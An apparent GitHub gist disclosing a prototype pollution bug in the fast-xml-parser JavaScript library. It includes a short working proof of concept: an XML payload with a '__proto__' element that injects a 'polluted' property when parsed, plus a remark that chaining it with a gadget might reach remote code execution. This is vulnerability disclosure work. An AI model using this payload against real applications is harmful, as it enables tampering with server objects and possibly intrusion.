Skip to content

Instantly share code, notes, and snippets.

Last active February 12, 2023 11:47
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?

Taking an example code from the github repo to demonstrate the bug:

const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");

let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);

console.log(jObj.polluted) // should return hacked


In the above screenshot you can see the jObj was polluted with a new property.

>{polluted: 'hacked'}

More information on prototype pollution can be found here:

As it is common for developers to pass user controllable input to XMLParser , this can to do unexpected results. By chaining it with some prototype pollution gadget it might even can lead to RCE in some cases

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment